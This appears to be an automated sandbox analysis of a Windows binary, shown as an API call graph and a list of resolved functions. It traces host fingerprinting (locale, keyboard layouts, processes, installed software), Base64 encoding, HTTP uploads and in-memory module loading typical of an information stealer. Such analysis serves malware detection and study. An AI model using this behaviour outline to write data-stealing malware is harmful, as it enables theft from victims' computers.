e95f2a HttpSendRequestA 14925 e95f35 InternetReadFile 14924->14925 14926 e95f6a InternetCloseHandle 14925->14926 14930 e95f61 14925->14930 14926->14851 14928 eaa9b0 4 API calls 14928->14930 14929 eaa8a0 lstrcpy 14929->14930 14930->14925 14930->14926 14930->14928 14930->14929 14933 ea1077 14931->14933 14932 ea1151 14932->13702 14933->14932 14934 eaa820 lstrlen lstrcpy 14933->14934 14934->14933 14937 ea0db7 14935->14937 14936 ea0f17 14936->13710 14937->14936 14938 ea0e27 StrCmpCA 14937->14938 14939 ea0e67 StrCmpCA 14937->14939 14940 ea0ea4 StrCmpCA 14937->14940 14941 eaa820 lstrlen lstrcpy 14937->14941 14938->14937 14939->14937 14940->14937 14941->14937 14946 ea0f67 14942->14946 14943 ea1044 14943->13718 14944 ea0fb2 StrCmpCA 14944->14946 14945 eaa820 lstrlen lstrcpy 14945->14946 14946->14943 14946->14944 14946->14945 14948 eaa740 lstrcpy 14947->14948 14949 ea1a26 14948->14949 14950 eaa9b0 4 API calls 14949->14950 14951 ea1a37 14950->14951 14952 eaa8a0 lstrcpy 14951->14952 14953 ea1a40 14952->14953 14954 eaa9b0 4 API calls 14953->14954 14955 ea1a5b 14954->14955 14956 eaa8a0 lstrcpy 14955->14956 14957 ea1a64 14956->14957 14958 eaa9b0 4 API calls 14957->14958 14959 ea1a7d 14958->14959 14960 eaa8a0 lstrcpy 14959->14960 14961 ea1a86 14960->14961 14962 eaa9b0 4 API calls 14961->14962 14963 ea1aa1 14962->14963 14964 eaa8a0 lstrcpy 14963->14964 14965 ea1aaa 14964->14965 14966 eaa9b0 4 API calls 14965->14966 14967 ea1ac3 14966->14967 14968 eaa8a0 lstrcpy 14967->14968 14969 ea1acc 14968->14969 14970 eaa9b0 4 API calls 14969->14970 14971 ea1ae7 14970->14971 14972 eaa8a0 lstrcpy 14971->14972 14973 ea1af0 14972->14973 14974 eaa9b0 4 API calls 14973->14974 14975 ea1b09 14974->14975 14976 eaa8a0 lstrcpy 14975->14976 14977 ea1b12 14976->14977 14978 eaa9b0 4 API calls 14977->14978 14979 ea1b2d 14978->14979 14980 eaa8a0 lstrcpy 14979->14980 14981 ea1b36 14980->14981 14982 eaa9b0 4 API calls 14981->14982 14983 ea1b4f 14982->14983 14984 eaa8a0 lstrcpy 14983->14984 14985 ea1b58 14984->14985 14986 eaa9b0 4 API calls 14985->14986 14987 ea1b76 14986->14987 14988 eaa8a0 lstrcpy 14987->14988 14989 ea1b7f 14988->14989 14990 ea7500 6 API calls 14989->14990 14991 ea1b96 14990->14991 14992 eaa920 3 API calls 14991->14992 14993 ea1ba9 14992->14993 14994 eaa8a0 lstrcpy 14993->14994 14995 ea1bb2 14994->14995 14996 eaa9b0 4 API calls 14995->14996 14997 ea1bdc 14996->14997 14998 eaa8a0 lstrcpy 14997->14998 14999 ea1be5 14998->14999 15000 eaa9b0 4 API calls 14999->15000 15001 ea1c05 15000->15001 15002 eaa8a0 lstrcpy 15001->15002 15003 ea1c0e 15002->15003 15711 ea7690 GetProcessHeap RtlAllocateHeap 15003->15711 15006 eaa9b0 4 API calls 15007 ea1c2e 15006->15007 15008 eaa8a0 lstrcpy 15007->15008 15009 ea1c37 15008->15009 15010 eaa9b0 4 API calls 15009->15010 15011 ea1c56 15010->15011 15012 eaa8a0 lstrcpy 15011->15012 15013 ea1c5f 15012->15013 15014 eaa9b0 4 API calls 15013->15014 15015 ea1c80 15014->15015 15016 eaa8a0 lstrcpy 15015->15016 15017 ea1c89 15016->15017 15718 ea77c0 GetCurrentProcess IsWow64Process 15017->15718 15020 eaa9b0 4 API calls 15021 ea1ca9 15020->15021 15022 eaa8a0 lstrcpy 15021->15022 15023 ea1cb2 15022->15023 15024 eaa9b0 4 API calls 15023->15024 15025 ea1cd1 15024->15025 15026 eaa8a0 lstrcpy 15025->15026 15027 ea1cda 15026->15027 15028 eaa9b0 4 API calls 15027->15028 15029 ea1cfb 15028->15029 15030 eaa8a0 lstrcpy 15029->15030 15031 ea1d04 15030->15031 15032 ea7850 3 API calls 15031->15032 15033 ea1d14 15032->15033 15034 eaa9b0 4 API calls 15033->15034 15035 ea1d24 15034->15035 15036 eaa8a0 lstrcpy 15035->15036 15037 ea1d2d 15036->15037 15038 eaa9b0 4 API calls 15037->15038 15039 ea1d4c 15038->15039 15040 eaa8a0 lstrcpy 15039->15040 15041 ea1d55 15040->15041 15042 eaa9b0 4 API calls 15041->15042 15043 ea1d75 15042->15043 15044 eaa8a0 lstrcpy 15043->15044 15045 ea1d7e 15044->15045 15046 ea78e0 3 API calls 15045->15046 15047 ea1d8e 15046->15047 15048 eaa9b0 4 API calls 15047->15048 15049 ea1d9e 15048->15049 15050 eaa8a0 lstrcpy 15049->15050 15051 ea1da7 15050->15051 15052 eaa9b0 4 API calls 15051->15052 15053 ea1dc6 15052->15053 15054 eaa8a0 lstrcpy 15053->15054 15055 ea1dcf 15054->15055 15056 eaa9b0 4 API calls 15055->15056 15057 ea1df0 15056->15057 15058 eaa8a0 lstrcpy 15057->15058 15059 ea1df9 15058->15059 15720 ea7980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15059->15720 15062 eaa9b0 4 API calls 15063 ea1e19 15062->15063 15064 eaa8a0 lstrcpy 15063->15064 15065 ea1e22 15064->15065 15066 eaa9b0 4 API calls 15065->15066 15067 ea1e41 15066->15067 15068 eaa8a0 lstrcpy 15067->15068 15069 ea1e4a 15068->15069 15070 eaa9b0 4 API calls 15069->15070 15071 ea1e6b 15070->15071 15072 eaa8a0 lstrcpy 15071->15072 15073 ea1e74 15072->15073 15722 ea7a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15073->15722 15076 eaa9b0 4 API calls 15077 ea1e94 15076->15077 15078 eaa8a0 lstrcpy 15077->15078 15079 ea1e9d 15078->15079 15080 eaa9b0 4 API calls 15079->15080 15081 ea1ebc 15080->15081 15082 eaa8a0 lstrcpy 15081->15082 15083 ea1ec5 15082->15083 15084 eaa9b0 4 API calls 15083->15084 15085 ea1ee5 15084->15085 15086 eaa8a0 lstrcpy 15085->15086 15087 ea1eee 15086->15087 15725 ea7b00 GetUserDefaultLocaleName 15087->15725 15090 eaa9b0 4 API calls 15091 ea1f0e 15090->15091 15092 eaa8a0 lstrcpy 15091->15092 15093 ea1f17 15092->15093 15094 eaa9b0 4 API calls 15093->15094 15095 ea1f36 15094->15095 15096 eaa8a0 lstrcpy 15095->15096 15097 ea1f3f 15096->15097 15098 eaa9b0 4 API calls 15097->15098 15099 ea1f60 15098->15099 15100 eaa8a0 lstrcpy 15099->15100 15101 ea1f69 15100->15101 15729 ea7b90 15101->15729 15103 ea1f80 15104 eaa920 3 API calls 15103->15104 15105 ea1f93 15104->15105 15106 eaa8a0 lstrcpy 15105->15106 15107 ea1f9c 15106->15107 15108 eaa9b0 4 API calls 15107->15108 15109 ea1fc6 15108->15109 15110 eaa8a0 lstrcpy 15109->15110 15111 ea1fcf 15110->15111 15112 eaa9b0 4 API calls 15111->15112 15113 ea1fef 15112->15113 15114 eaa8a0 lstrcpy 15113->15114 15115 ea1ff8 15114->15115 15741 ea7d80 GetSystemPowerStatus 15115->15741 15118 eaa9b0 4 API calls 15119 ea2018 15118->15119 15120 eaa8a0 lstrcpy 15119->15120 15121 ea2021 15120->15121 15122 eaa9b0 4 API calls 15121->15122 15123 ea2040 15122->15123 15124 eaa8a0 lstrcpy 15123->15124 15125 ea2049 15124->15125 15126 eaa9b0 4 API calls 15125->15126 15127 ea206a 15126->15127 15128 eaa8a0 lstrcpy 15127->15128 15129 ea2073 15128->15129 15130 ea207e GetCurrentProcessId 15129->15130 15743 ea9470 OpenProcess 15130->15743 15133 eaa920 3 API calls 15134 ea20a4 15133->15134 15135 eaa8a0 lstrcpy 15134->15135 15136 ea20ad 15135->15136 15137 eaa9b0 4 API calls 15136->15137 15138 ea20d7 15137->15138 15139 eaa8a0 lstrcpy 15138->15139 15140 ea20e0 15139->15140 15141 eaa9b0 4 API calls 15140->15141 15142 ea2100 15141->15142 15143 eaa8a0 lstrcpy 15142->15143 15144 ea2109 15143->15144 15748 ea7e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15144->15748 15147 eaa9b0 4 API calls 15148 ea2129 15147->15148 15149 eaa8a0 lstrcpy 15148->15149 15150 ea2132 15149->15150 15151 eaa9b0 4 API calls 15150->15151 15152 ea2151 15151->15152 15153 eaa8a0 lstrcpy 15152->15153 15154 ea215a 15153->15154 15155 eaa9b0 4 API calls 15154->15155 15156 ea217b 15155->15156 15157 eaa8a0 lstrcpy 15156->15157 15158 ea2184 15157->15158 15752 ea7f60 15158->15752 15161 eaa9b0 4 API calls 15162 ea21a4 15161->15162 15163 eaa8a0 lstrcpy 15162->15163 15164 ea21ad 15163->15164 15165 eaa9b0 4 API calls 15164->15165 15166 ea21cc 15165->15166 15167 eaa8a0 lstrcpy 15166->15167 15168 ea21d5 15167->15168 15169 eaa9b0 4 API calls 15168->15169 15170 ea21f6 15169->15170 15171 eaa8a0 lstrcpy 15170->15171 15172 ea21ff 15171->15172 15765 ea7ed0 GetSystemInfo wsprintfA 15172->15765 15175 eaa9b0 4 API calls 15176 ea221f 15175->15176 15177 eaa8a0 lstrcpy 15176->15177 15178 ea2228 15177->15178 15179 eaa9b0 4 API calls 15178->15179 15180 ea2247 15179->15180 15181 eaa8a0 lstrcpy 15180->15181 15182 ea2250 15181->15182 15183 eaa9b0 4 API calls 15182->15183 15184 ea2270 15183->15184 15185 eaa8a0 lstrcpy 15184->15185 15186 ea2279 15185->15186 15767 ea8100 GetProcessHeap RtlAllocateHeap 15186->15767 15189 eaa9b0 4 API calls 15190 ea2299 15189->15190 15191 eaa8a0 lstrcpy 15190->15191 15192 ea22a2 15191->15192 15193 eaa9b0 4 API calls 15192->15193 15194 ea22c1 15193->15194 15195 eaa8a0 lstrcpy 15194->15195 15196 ea22ca 15195->15196 15197 eaa9b0 4 API calls 15196->15197 15198 ea22eb 15197->15198 15199 eaa8a0 lstrcpy 15198->15199 15200 ea22f4 15199->15200 15773 ea87c0 15200->15773 15203 eaa920 3 API calls 15204 ea231e 15203->15204 15205 eaa8a0 lstrcpy 15204->15205 15206 ea2327 15205->15206 15207 eaa9b0 4 API calls 15206->15207 15208 ea2351 15207->15208 15209 eaa8a0 lstrcpy 15208->15209 15210 ea235a 15209->15210 15211 eaa9b0 4 API calls 15210->15211 15212 ea237a 15211->15212 15213 eaa8a0 lstrcpy 15212->15213 15214 ea2383 15213->15214 15215 eaa9b0 4 API calls 15214->15215 15216 ea23a2 15215->15216 15217 eaa8a0 lstrcpy 15216->15217 15218 ea23ab 15217->15218 15778 ea81f0 15218->15778 15220 ea23c2 15221 eaa920 3 API calls 15220->15221 15222 ea23d5 15221->15222 15223 eaa8a0 lstrcpy 15222->15223 15224 ea23de 15223->15224 15225 eaa9b0 4 API calls 15224->15225 15226 ea240a 15225->15226 15227 eaa8a0 lstrcpy 15226->15227 15228 ea2413 15227->15228 15229 eaa9b0 4 API calls 15228->15229 15230 ea2432 15229->15230 15231 eaa8a0 lstrcpy 15230->15231 15232 ea243b 15231->15232 15233 eaa9b0 4 API calls 15232->15233 15234 ea245c 15233->15234 15235 eaa8a0 lstrcpy 15234->15235 15236 ea2465 15235->15236 15237 eaa9b0 4 API calls 15236->15237 15238 ea2484 15237->15238 15239 eaa8a0 lstrcpy 15238->15239 15240 ea248d 15239->15240 15241 eaa9b0 4 API calls 15240->15241 15242 ea24ae 15241->15242 15243 eaa8a0 lstrcpy 15242->15243 15244 ea24b7 15243->15244 15786 ea8320 15244->15786 15246 ea24d3 15247 eaa920 3 API calls 15246->15247 15248 ea24e6 15247->15248 15249 eaa8a0 lstrcpy 15248->15249 15250 ea24ef 15249->15250 15251 eaa9b0 4 API calls 15250->15251 15252 ea2519 15251->15252 15253 eaa8a0 lstrcpy 15252->15253 15254 ea2522 15253->15254 15255 eaa9b0 4 API calls 15254->15255 15256 ea2543 15255->15256 15257 eaa8a0 lstrcpy 15256->15257 15258 ea254c 15257->15258 15259 ea8320 17 API calls 15258->15259 15260 ea2568 15259->15260 15261 eaa920 3 API calls 15260->15261 15262 ea257b 15261->15262 15263 eaa8a0 lstrcpy 15262->15263 15264 ea2584 15263->15264 15265 eaa9b0 4 API calls 15264->15265 15266 ea25ae 15265->15266 15267 eaa8a0 lstrcpy 15266->15267 15268 ea25b7 15267->15268 15269 eaa9b0 4 API calls 15268->15269 15270 ea25d6 15269->15270 15271 eaa8a0 lstrcpy 15270->15271 15272 ea25df 15271->15272 15273 eaa9b0 4 API calls 15272->15273 15274 ea2600 15273->15274 15275 eaa8a0 lstrcpy 15274->15275 15276 ea2609 15275->15276 15822 ea8680 15276->15822 15278 ea2620 15279 eaa920 3 API calls 15278->15279 15280 ea2633 15279->15280 15281 eaa8a0 lstrcpy 15280->15281 15282 ea263c 15281->15282 15283 ea265a lstrlen 15282->15283 15284 ea266a 15283->15284 15285 eaa740 lstrcpy 15284->15285 15286 ea267c 15285->15286 15287 e91590 lstrcpy 15286->15287 15288 ea268d 15287->15288 15832 ea5190 15288->15832 15290 ea2699 15290->13722 16020 eaaad0 15291->16020 15293 e95009 InternetOpenUrlA 15294 e95021 15293->15294 15295 e9502a InternetReadFile 15294->15295 15296 e950a0 InternetCloseHandle InternetCloseHandle 15294->15296 15295->15294 15297 e950ec 15296->15297 15297->13726 16021 e998d0 15298->16021 15300 ea0759 15301 ea0a38 15300->15301 15302 ea077d 15300->15302 15303 e91590 lstrcpy 15301->15303 15305 ea0799 StrCmpCA 15302->15305 15304 ea0a49 15303->15304 16197 ea0250 15304->16197 15307 ea07a8 15305->15307 15308 ea0843 15305->15308 15310 eaa7a0 lstrcpy 15307->15310 15311 ea0865 StrCmpCA 15308->15311 15312 ea07c3 15310->15312 15313 ea0874 15311->15313 15350 ea096b 15311->15350 15314 e91590 lstrcpy 15312->15314 15316 eaa740 lstrcpy 15313->15316 15315 ea080c 15314->15315 15317 eaa7a0 lstrcpy 15315->15317 15319 ea0881 15316->15319 15320 ea0823 15317->15320 15318 ea099c StrCmpCA 15321 ea09ab 15318->15321 15339 ea0a2d 15318->15339 15322 eaa9b0 4 API calls 15319->15322 15323 eaa7a0 lstrcpy 15320->15323 15324 e91590 lstrcpy 15321->15324 15325 ea08ac 15322->15325 15326 ea083e 15323->15326 15327 ea09f4 15324->15327 15328 eaa920 3 API calls 15325->15328 16024 e9fb00 15326->16024 15331 eaa7a0 lstrcpy 15327->15331 15329 ea08b3 15328->15329 15332 eaa9b0 4 API calls 15329->15332 15333 ea0a0d 15331->15333 15335 ea08ba 15332->15335 15334 eaa7a0 lstrcpy 15333->15334 15336 ea0a28 15334->15336 15337 eaa8a0 lstrcpy 15335->15337 16140 ea0030 15336->16140 15339->13730 15350->15318 15672 eaa7a0 lstrcpy 15671->15672 15673 e91683 15672->15673 15674 eaa7a0 lstrcpy 15673->15674 15675 e91695 15674->15675 15676 eaa7a0 lstrcpy 15675->15676 15677 e916a7 15676->15677 15678 eaa7a0 lstrcpy 15677->15678 15679 e915a3 15678->15679 15679->14553 15681 e947c6 15680->15681 15682 e94838 lstrlen 15681->15682 15706 eaaad0 15682->15706 15684 e94848 InternetCrackUrlA 15685 e94867 15684->15685 15685->14630 15687 eaa740 lstrcpy 15686->15687 15688 ea8b74 15687->15688 15689 eaa740 lstrcpy 15688->15689 15690 ea8b82 GetSystemTime 15689->15690 15691 ea8b99 15690->15691 15692 eaa7a0 lstrcpy 15691->15692 15693 ea8bfc 15692->15693 15693->14645 15695 eaa931 15694->15695 15696 eaa988 15695->15696 15698 eaa968 lstrcpy lstrcat 15695->15698 15697 eaa7a0 lstrcpy 15696->15697 15699 eaa994 15697->15699 15698->15696 15699->14648 15700->14763 15702 e99af9 LocalAlloc 15701->15702 15703 e94eee 15701->15703 15702->15703 15704 e99b14 CryptStringToBinaryA 15702->15704 15703->14651 15703->14654 15704->15703 15705 e99b39 LocalFree 15704->15705 15705->15703 15706->15684 15707->14773 15708->14914 15709->14916 15710->14924 15839 ea77a0 15711->15839 15714 ea1c1e 15714->15006 15715 ea76c6 RegOpenKeyExA 15716 ea76e7 RegQueryValueExA 15715->15716 15717 ea7704 RegCloseKey 15715->15717 15716->15717 15717->15714 15719 ea1c99 15718->15719 15719->15020 15721 ea1e09 15720->15721 15721->15062 15723 ea7a9a wsprintfA 15722->15723 15724 ea1e84 15722->15724 15723->15724 15724->15076 15726 ea7b4d 15725->15726 15728 ea1efe 15725->15728 15846 ea8d20 LocalAlloc CharToOemW 15726->15846 15728->15090 15730 eaa740 lstrcpy 15729->15730 15731 ea7bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15730->15731 15739 ea7c25 15731->15739 15732 ea7d18 15734 ea7d28 15732->15734 15735 ea7d1e LocalFree 15732->15735 15733 ea7c46 GetLocaleInfoA 15733->15739 15736 eaa7a0 lstrcpy 15734->15736 15735->15734 15740 ea7d37 15736->15740 15737 eaa8a0 lstrcpy 15737->15739 15738 eaa9b0 lstrcpy lstrlen lstrcpy lstrcat 15738->15739 15739->15732 15739->15733 15739->15737 15739->15738 15740->15103 15742 ea2008 15741->15742 15742->15118 15744 ea9493 GetModuleFileNameExA CloseHandle 15743->15744 15745 ea94b5 15743->15745 15744->15745 15746 eaa740 lstrcpy 15745->15746 15747 ea2091 15746->15747 15747->15133 15749 ea7e68 RegQueryValueExA 15748->15749 15750 ea2119 15748->15750 15751 ea7e8e RegCloseKey 15749->15751 15750->15147 15751->15750 15753 ea7fb9 GetLogicalProcessorInformationEx 15752->15753 15754 ea7fd8 GetLastError 15753->15754 15755 ea8029 15753->15755 15757 ea8022 15754->15757 15762 ea7fe3 15754->15762 15761 ea89f0 2 API calls 15755->15761 15756 ea2194 15756->15161 15757->15756 15760 ea89f0 2 API calls 15757->15760 15760->15756 15763 ea807b 15761->15763 15762->15753 15762->15756 15847 ea89f0 15762->15847 15850 ea8a10 GetProcessHeap RtlAllocateHeap 15762->15850 15763->15757 15764 ea8084 wsprintfA 15763->15764 15764->15756 15766 ea220f 15765->15766 15766->15175 15768 ea89b0 15767->15768 15769 ea814d GlobalMemoryStatusEx 15768->15769 15770 ea8163 15769->15770 15771 ea819b wsprintfA 15770->15771 15772 ea2289 15771->15772 15772->15189 15774 ea87fb GetProcessHeap RtlAllocateHeap wsprintfA 15773->15774 15776 eaa740 lstrcpy 15774->15776 15777 ea230b 15776->15777 15777->15203 15779 eaa740 lstrcpy 15778->15779 15781 ea8229 15779->15781 15780 ea8263 15783 eaa7a0 lstrcpy 15780->15783 15781->15780 15782 eaa9b0 lstrcpy lstrlen lstrcpy lstrcat 15781->15782 15785 eaa8a0 lstrcpy 15781->15785 15782->15781 15784 ea82dc 15783->15784 15784->15220 15785->15781 15787 eaa740 lstrcpy 15786->15787 15788 ea835c RegOpenKeyExA 15787->15788 15789 ea83ae 15788->15789 15790 ea83d0 15788->15790 15791 eaa7a0 lstrcpy 15789->15791 15792 ea83f8 RegEnumKeyExA 15790->15792 15793 ea8613 RegCloseKey 15790->15793 15803 ea83bd 15791->15803 15795 ea860e 15792->15795 15796 ea843f wsprintfA RegOpenKeyExA 15792->15796 15794 eaa7a0 lstrcpy 15793->15794 15794->15803 15795->15793 15797 ea84c1 RegQueryValueExA 15796->15797 15798 ea8485 RegCloseKey RegCloseKey 15796->15798 15800 ea84fa lstrlen 15797->15800 15801 ea8601 RegCloseKey 15797->15801 15799 eaa7a0 lstrcpy 15798->15799 15799->15803 15800->15801 15802 ea8510 15800->15802 15801->15795 15804 eaa9b0 4 API calls 15802->15804 15803->15246 15805 ea8527 15804->15805 15806 eaa8a0 lstrcpy 15805->15806 15807 ea8533 15806->15807 15808 eaa9b0 4 API calls 15807->15808 15809 ea8557 15808->15809 15810 eaa8a0 lstrcpy 15809->15810 15811 ea8563 15810->15811 15812 ea856e RegQueryValueExA 15811->15812 15812->15801 15813 ea85a3 15812->15813 15814 eaa9b0 4 API calls 15813->15814 15815 ea85ba 15814->15815 15816 eaa8a0 lstrcpy 15815->15816 15817 ea85c6 15816->15817 15818 eaa9b0 4 API calls 15817->15818 15819 ea85ea 15818->15819 15820 eaa8a0 lstrcpy 15819->15820 15821 ea85f6 15820->15821 15821->15801 15823 eaa740 lstrcpy 15822->15823 15824 ea86bc CreateToolhelp32Snapshot Process32First 15823->15824 15825 ea86e8 Process32Next 15824->15825 15826 ea875d CloseHandle 15824->15826 15825->15826 15828 ea86fd 15825->15828 15827 eaa7a0 lstrcpy 15826->15827 15829 ea8776 15827->15829 15828->15825 15830 eaa9b0 lstrcpy lstrlen lstrcpy lstrcat 15828->15830 15831 eaa8a0 lstrcpy 15828->15831 15829->15278 15830->15828 15831->15828 15833 eaa7a0 lstrcpy 15832->15833 15834 ea51b5 15833->15834 15835 e91590 lstrcpy 15834->15835 15836 ea51c6 15835->15836 15851 e95100 15836->15851 15838 ea51cf 15838->15290 15842 ea7720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15839->15842 15841 ea76b9 15841->15714 15841->15715 15843 ea7780 RegCloseKey 15842->15843 15844 ea7765 RegQueryValueExA 15842->15844 15845 ea7793 15843->15845 15844->15843 15845->15841 15846->15728 15848 ea89f9 GetProcessHeap HeapFree 15847->15848 15849 ea8a0c 15847->15849 15848->15849 15849->15762 15850->15762 15852 eaa7a0 lstrcpy 15851->15852 15853 e95119 15852->15853 15854 e947b0 2 API calls 15853->15854 15855 e95125 15854->15855 16011 ea8ea0 15855->16011 15857 e95184 15858 e95192 lstrlen 15857->15858 15859 e951a5 15858->15859 15860 ea8ea0 4 API calls 15859->15860 15861 e951b6 15860->15861 15862 eaa740 lstrcpy 15861->15862 15863 e951c9 15862->15863 15864 eaa740 lstrcpy 15863->15864 15865 e951d6 15864->15865 15866 eaa740 lstrcpy 15865->15866 15867 e951e3 15866->15867 15868 eaa740 lstrcpy 15867->15868 15869 e951f0 15868->15869 15870 eaa740 lstrcpy 15869->15870 15871 e951fd InternetOpenA StrCmpCA 15870->15871 15872 e9522f 15871->15872 15873 e958c4 InternetCloseHandle 15872->15873 15874 ea8b60 3 API calls 15872->15874 15881 e958d9 codecvt 15873->15881 15875 e9524e 15874->15875 15876 eaa920 3 API calls 15875->15876 15877 e95261 15876->15877 15878 eaa8a0 lstrcpy 15877->15878 15879 e9526a 15878->15879 15880 eaa9b0 4 API calls 15879->15880 15882 e952ab 15880->15882 15883 eaa7a0 lstrcpy 15881->15883 15884 eaa920 3 API calls 15882->15884 15892 e95913 15883->15892 15885 e952b2 15884->15885 15886 eaa9b0 4 API calls 15885->15886 15887 e952b9 15886->15887 15888 eaa8a0 lstrcpy 15887->15888 15889 e952c2 15888->15889 15890 eaa9b0 4 API calls 15889->15890 15891 e95303 15890->15891 15893 eaa920 3 API calls 15891->15893 15892->15838 15894 e9530a 15893->15894 15895 eaa8a0 lstrcpy 15894->15895 15896 e95313 15895->15896 15897 e95329 InternetConnectA 15896->15897 15897->15873 15898 e95359 HttpOpenRequestA 15897->15898 15900 e958b7 InternetCloseHandle 15898->15900 15901 e953b7 15898->15901 15900->15873 15902 eaa9b0 4 API calls 15901->15902 15903 e953cb 15902->15903 15904 eaa8a0 lstrcpy 15903->15904 15905 e953d4 15904->15905 15906 eaa920 3 API calls 15905->15906 15907 e953f2 15906->15907 15908 eaa8a0 lstrcpy 15907->15908 15909 e953fb 15908->15909 15910 eaa9b0 4 API calls 15909->15910 15911 e9541a 15910->15911 15912 eaa8a0 lstrcpy 15911->15912 15913 e95423 15912->15913 15914 eaa9b0 4 API calls 15913->15914 15915 e95444 15914->15915 15916 eaa8a0 lstrcpy 15915->15916 15917 e9544d 15916->15917 15918 eaa9b0 4 API calls 15917->15918 15919 e9546e 15918->15919 16012 ea8ea9 16011->16012 16013 ea8ead CryptBinaryToStringA 16011->16013 16012->15857 16013->16012 16014 ea8ece GetProcessHeap RtlAllocateHeap 16013->16014 16014->16012 16015 ea8ef4 codecvt 16014->16015 16016 ea8f05 CryptBinaryToStringA 16015->16016 16016->16012 16020->15293 16263 e99880 16021->16263 16023 e998e1 16023->15300 16025 eaa740 lstrcpy 16024->16025 16198 eaa740 lstrcpy 16197->16198 16199 ea0266 16198->16199 16200 ea8de0 2 API calls 16199->16200 16201 ea027b 16200->16201 16202 eaa920 3 API calls 16201->16202 16203 ea028b 16202->16203 16204 eaa8a0 lstrcpy 16203->16204 16205 ea0294 16204->16205 16206 eaa9b0 4 API calls 16205->16206 16264 e9988e 16263->16264 16267 e96fb0 16264->16267 16266 e998ad codecvt 16266->16023 16270 e96d40 16267->16270 16271 e96d63 16270->16271 16285 e96d59 16270->16285 16286 e96530 16271->16286 16275 e96dbe 16275->16285 16296 e969b0 16275->16296 16277 e96e2a 16278 e96ee6 VirtualFree 16277->16278 16280 e96ef7 16277->16280 16277->16285 16278->16280 16279 e96f41 16283 ea89f0 2 API calls 16279->16283 16279->16285 16280->16279 16281 e96f38 16280->16281 16282 e96f26 FreeLibrary 16280->16282 16284 ea89f0 2 API calls 16281->16284 16282->16280 16283->16285 16284->16279 16285->16266 16287 e96542 16286->16287 16289 e96549 16287->16289 16306 ea8a10 GetProcessHeap RtlAllocateHeap 16287->16306 16289->16285 16290 e96660 16289->16290 16293 e9668f VirtualAlloc 16290->16293 16292 e96730 16294 e9673c 16292->16294 16295 e96743 VirtualAlloc 16292->16295 16293->16292 16293->16294 16294->16275 16295->16294 16297 e969c9 16296->16297 16301 e969d5 16296->16301 16298 e96a09 LoadLibraryA 16297->16298 16297->16301 16299 e96a32 16298->16299 16298->16301 16303 e96ae0 16299->16303 16307 ea8a10 GetProcessHeap RtlAllocateHeap 16299->16307 16301->16277 16302 e96ba8 GetProcAddress 16302->16301 16302->16303 16303->16301 16303->16302 16304 ea89f0 2 API calls 16304->16303 16305 e96a8b 16305->16301 16305->16304 16306->16289 16307->16305

                                          Executed Functions

                                          Function 00EA9860 Relevance: 59.7, APIs: 33, Strings: 1, Instructions: 212libraryloaderCOMMON
                                          Download Yara Rule

                                          Control-flow Graph

                                          • Executed
                                          • Not Executed
                                          control_flow_graph 660 ea9860-ea9874 call ea9750 663 ea987a-ea9a8e call ea9780 GetProcAddress * 21 660->663 664 ea9a93-ea9af2 LoadLibraryA * 5 660->664 663->664 666 ea9b0d-ea9b14 664->666 667 ea9af4-ea9b08 GetProcAddress 664->667 669 ea9b46-ea9b4d 666->669 670 ea9b16-ea9b41 GetProcAddress * 2 666->670 667->666 671 ea9b68-ea9b6f 669->671 672 ea9b4f-ea9b63 GetProcAddress 669->672 670->669 673 ea9b89-ea9b90 671->673 674 ea9b71-ea9b84 GetProcAddress 671->674 672->671 675 ea9b92-ea9bbc GetProcAddress * 2 673->675 676 ea9bc1-ea9bc2 673->676 674->673 675->676
                                          APIs
                                          • GetProcAddress.KERNEL32(76210000,00BB1518), ref: 00EA98A1
                                          • GetProcAddress.KERNEL32(76210000,00BB1770), ref: 00EA98BA
                                          • GetProcAddress.KERNEL32(76210000,00BB1530), ref: 00EA98D2
                                          • GetProcAddress.KERNEL32(76210000,00BB1548), ref: 00EA98EA
                                          • GetProcAddress.KERNEL32(76210000,00BB1560), ref: 00EA9903
                                          • GetProcAddress.KERNEL32(76210000,00BB8BA8), ref: 00EA991B
                                          • GetProcAddress.KERNEL32(76210000,00BA5208), ref: 00EA9933
                                          • GetProcAddress.KERNEL32(76210000,00BA4FE8), ref: 00EA994C
                                          • GetProcAddress.KERNEL32(76210000,00BB1698), ref: 00EA9964
                                          • GetProcAddress.KERNEL32(76210000,00BB16E0), ref: 00EA997C
                                          • GetProcAddress.KERNEL32(76210000,00BB16B0), ref: 00EA9995
                                          • GetProcAddress.KERNEL32(76210000,00BB16C8), ref: 00EA99AD
                                          • GetProcAddress.KERNEL32(76210000,00BA5088), ref: 00EA99C5
                                          • GetProcAddress.KERNEL32(76210000,00BB16F8), ref: 00EA99DE
                                          • GetProcAddress.KERNEL32(76210000,00BB1710), ref: 00EA99F6
                                          • GetProcAddress.KERNEL32(76210000,00BA5288), ref: 00EA9A0E
                                          • GetProcAddress.KERNEL32(76210000,00BB1740), ref: 00EA9A27
                                          • GetProcAddress.KERNEL32(76210000,00BB1758), ref: 00EA9A3F
                                          • GetProcAddress.KERNEL32(76210000,00BA5268), ref: 00EA9A57
                                          • GetProcAddress.KERNEL32(76210000,00BB1890), ref: 00EA9A70
                                          • GetProcAddress.KERNEL32(76210000,00BA5008), ref: 00EA9A88
                                          • LoadLibraryA.KERNEL32(00BB18A8,?,00EA6A00), ref: 00EA9A9A
                                          • LoadLibraryA.KERNEL32(00BB17E8,?,00EA6A00), ref: 00EA9AAB
                                          • LoadLibraryA.KERNEL32(00BB1860,?,00EA6A00), ref: 00EA9ABD
                                          • LoadLibraryA.KERNEL32(00BB1800,?,00EA6A00), ref: 00EA9ACF
                                          • LoadLibraryA.KERNEL32(00BB1848,?,00EA6A00), ref: 00EA9AE0
                                          • GetProcAddress.KERNEL32(75B30000,00BB1878), ref: 00EA9B02
                                          • GetProcAddress.KERNEL32(751E0000,00BB1818), ref: 00EA9B23
                                          • GetProcAddress.KERNEL32(751E0000,00BB1830), ref: 00EA9B3B
                                          • GetProcAddress.KERNEL32(76910000,00BB8CE0), ref: 00EA9B5D
                                          • GetProcAddress.KERNEL32(75670000,00BA5028), ref: 00EA9B7E
                                          • GetProcAddress.KERNEL32(77310000,00BB8C58), ref: 00EA9B9F
                                          • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 00EA9BB6
                                          Strings
                                          • NtQueryInformationProcess, xrefs: 00EA9BAA
                                          Memory Dump Source
